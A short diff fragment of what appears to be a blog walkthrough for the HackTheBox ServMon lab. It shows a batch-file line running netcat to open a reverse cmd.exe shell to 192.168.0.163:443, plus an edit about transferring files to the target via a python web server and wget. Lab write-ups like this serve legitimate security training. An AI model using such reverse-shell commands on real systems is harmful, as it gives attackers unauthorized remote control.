will-analyze/will-analyze.github.io/_posts/2024-09-29-HackTheBox_ServMon_Walkthrough.md

 	@echo off
 	c:\\temp\\nc64.exe 192.168.0.163 443 -e cmd.exe

-**[COMPLETED]** easiest way I saw to do this was to set up a python web server and transfer the files through iwr on the target machine:
+**[COMPLETED]** easiest way I saw to do this was to set up a python web server and transfer the files through wget on the target machine:

 attacker machine (your machine):